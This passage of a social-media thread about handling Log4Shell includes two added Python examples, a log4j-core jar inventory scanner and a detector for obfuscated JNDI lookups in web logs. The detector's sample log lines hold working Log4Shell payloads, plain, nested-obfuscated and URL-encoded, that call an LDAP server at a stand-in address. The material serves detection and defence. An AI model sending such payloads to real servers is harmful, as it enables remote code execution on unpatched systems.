
is showing us that the current state of vulnerability scanning technology is insufficient. Who has ideas on how to improve in a way that would make it possible to properly handle an event?

@seb you probably want to look at the work of the OpenSSF :)

@seb I think the number one thing that would have helped us is a *proper* software inventory: vendors, versions, dependencies, libraries, etc, so we could have more easily targeted our efforts.
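The inventory the reply above asks for is the part most teams had to improvise during Log4Shell: not just "which hosts", but "which copy of log4j-core, at which version, nested inside which WAR or shaded jar". The following is an added example, not code from the original thread or from any project it mentions. It walks a directory tree, opens every jar/war/ear, recurses into archives nested inside them, reads the Maven `pom.properties` that log4j-core ships under `META-INF/maven/org.apache.logging.log4j/log4j-core/`, and classifies the version against CVE-2021-44228 (affected 2.0-beta9 through 2.14.1, fixed in 2.15.0). It also records whether `JndiLookup.class` is still present, since deleting that class was the common hotfix on jars that could not be upgraded. The sample deployment it scans is constructed in a temp dir by `build_sample_tree`; the jar contents are fake (a four-byte placeholder in place of the real class file).

```python
"""Added example: inventory every copy of log4j-core under a directory tree,
including copies nested inside WAR/EAR/shaded jars, and classify each one
against CVE-2021-44228 (fixed in log4j-core 2.15.0)."""
import io
import os
import re
import tempfile
import zipfile

# Paths that identify a log4j-core jar and the class behind the JNDI lookup.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXTS = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1, 1, 0); '2.0-beta9' -> (2, 0, 0, 0, 9).
    Final releases (rank 1) sort after pre-releases (rank 0) of the same number."""
    base, _, pre = text.partition("-")
    nums = [int(p) for p in re.findall(r"\d+", base)][:3]
    nums += [0] * (3 - len(nums))
    pre_match = re.search(r"\d+", pre)
    pre_num = int(pre_match.group()) if pre_match else 0
    return tuple(nums) + ((0, pre_num) if pre else (1, 0))


def version_status(version):
    """Classify a log4j-core version against CVE-2021-44228 (2.0-beta9 .. 2.14.1)."""
    v = parse_version(version)
    if v < parse_version("2.0-beta9"):
        return "not-affected"  # 1.x has no JNDI lookup (it is end-of-life for other reasons)
    if v < parse_version("2.15.0"):
        return "vulnerable"
    return "patched"


def inspect_archive(data, name, findings, depth=0):
    """Record every log4j-core found in an archive (bytes), recursing into nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # not a zip container; nothing to inventory
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names:
            props = dict(
                line.split("=", 1)
                for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines()
                if "=" in line and not line.startswith("#")
            )
            version = props.get("version", "unknown").strip()
            findings.append({
                "location": name,
                "version": version,
                "status": version_status(version) if version != "unknown" else "unknown",
                "jndi_lookup_present": JNDI_LOOKUP_CLASS in names,
            })
        elif JNDI_LOOKUP_CLASS in names:
            # copy without Maven metadata (repackaged build): version unknown, still worth flagging
            findings.append({"location": name, "version": "unknown",
                             "status": "unknown", "jndi_lookup_present": True})
        if depth < 3:  # fat jars inside WARs inside EARs are common; bound the recursion anyway
            for entry in sorted(names):
                if entry.lower().endswith(ARCHIVE_EXTS):
                    inspect_archive(zf.read(entry), f"{name}!{entry}", findings, depth + 1)


def inventory(root):
    """Walk a directory tree and return findings for every archive under it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in sorted(files):
            if fn.lower().endswith(ARCHIVE_EXTS):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    location = os.path.relpath(path, root).replace(os.sep, "/")
                    inspect_archive(fh.read(), location, findings)
    return findings


def build_sample_tree(root):
    """Constructed fake deployment for demonstration (not real artifacts)."""
    def jar(version, with_jndi=True):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\n")
            if with_jndi:
                zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder, not a class file
        return buf.getvalue()

    os.makedirs(os.path.join(root, "app", "WEB-INF", "lib"), exist_ok=True)
    with open(os.path.join(root, "app", "WEB-INF", "lib", "log4j-core-2.14.1.jar"), "wb") as f:
        f.write(jar("2.14.1"))
    with open(os.path.join(root, "log4j-core-2.17.1.jar"), "wb") as f:
        f.write(jar("2.17.1"))
    # A WAR bundling a 2.14.1 whose JndiLookup.class was removed (the hotfix mitigation).
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", jar("2.14.1", with_jndi=False))
        zf.writestr("WEB-INF/lib/README.txt", b"no log4j here")
    with open(os.path.join(root, "legacy.war"), "wb") as f:
        f.write(war.getvalue())


def demo():
    """Build the constructed sample tree in a temp dir and inventory it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return inventory(tmp)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run it against a real host by calling `inventory("/")` (or the application directories you care about) instead of `demo()`. Two caveats a practitioner would want: a shaded or relocated build can rename the package path, so a jar without the Maven metadata and without the class at its usual path will be missed, and the version classification only covers CVE-2021-44228; the later log4j CVEs of December 2021 have their own fixed versions and should be checked separately.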

@seb

facetious answer: use c#. interestingly i wonder if the log4net library is similarly compromised.

better answer: there are some great resources out there that detail how to exploit, detect, patch & test: motasem-notes.net/the-log4j-vu
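On the "detect" part of that list: a plain search for `${jndi:` in access logs misses most real traffic, because attackers wrapped the trigger in nested log4j lookups (`${lower:j}`, `${upper:n}`, `${::-j}`, `${env:NONE:-j}`) and URL-encoded it. The following is an added example, not code from the thread or from the linked notes. It normalizes each log line the way a vulnerable log4j 2.x would (URL-decode, then repeatedly collapse the innermost lookup) and only then looks for `jndi:`. The log lines are constructed for the example, using documentation IP ranges; the resolver covers only the string lookups that appeared in obfuscated payloads, not the full set of log4j lookups, and does not handle double URL-encoding.

```python
"""Added example: flag Log4Shell-style JNDI lookups in web-server log lines,
including URL-encoded and nested-lookup obfuscation."""
import re
from urllib.parse import unquote

# Innermost ${...}: a body with no nested ${ or } inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def resolve_inner(body):
    """Evaluate one innermost lookup as vulnerable log4j 2.x would for the
    string-manipulation lookups seen in obfuscated payloads. Anything else
    (jndi:, date:, a plain env:) is returned unchanged so the caller can stop."""
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # Default-value syntax: ${anything:-value} yields value when the lookup
        # fails, which is what ${::-j} and ${env:NONE:-j} rely on.
        return body.split(":-", 1)[1]
    return "${" + body + "}"


def normalize(text, max_rounds=10):
    """URL-decode, then collapse innermost lookups until the string is stable."""
    text = unquote(text)  # %24%7B -> ${ for payloads delivered in URLs
    for _ in range(max_rounds):
        new = INNER_LOOKUP.sub(lambda m: resolve_inner(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def scan_line(line):
    """Return (is_hit, normalized_line)."""
    norm = normalize(line)
    return bool(JNDI.search(norm)), norm


def scan_logs(lines):
    """Return [(line_number, normalized_line)] for every hit."""
    return [(i, norm) for i, line in enumerate(lines, 1)
            for hit, norm in [scan_line(line)] if hit]


# Constructed sample access-log lines (TEST-NET addresses), not captured traffic.
SAMPLE_LOGS = [
    '198.51.100.7 - - [10/Dec/2021:10:03:11 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [10/Dec/2021:10:03:12 +0000] "GET / HTTP/1.1" 200 12 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '198.51.100.8 - - [10/Dec/2021:10:03:13 +0000] "GET / HTTP/1.1" 200 12 "-" "${${env:NaN:-j}${upper:n}di:${::-l}dap://198.51.100.23:1389/a}"',
    '198.51.100.9 - - [10/Dec/2021:10:03:14 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.23%2Fa%7D HTTP/1.1" 400 0 "-" "curl/7.79"',
    '198.51.100.10 - - [10/Dec/2021:10:03:15 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 33 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, norm in scan_logs(SAMPLE_LOGS):
        print(f"line {n}: {norm}")
```

Of the five constructed lines, lines 2, 3 and 4 are reported; line 5 carries a harmless `${date:yyyy}` lookup and is not. Any line containing `${` at all is worth a second look in an incident, but normalizing first keeps the high-confidence alert tied to an actual JNDI trigger.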

@seb

the link i sent before explains how nmap and burp can be used to scan for susceptible jars.

perhaps companies will now begin thinking about baking pentesting into the CI/CD pipeline as opposed to an annual pentest audit.

@seb [only partly joking] rewrite it all in Rust-lang, (they have relatively low cases of smugness, despite having all of the "we told you so" high ground.)

IOC.exchange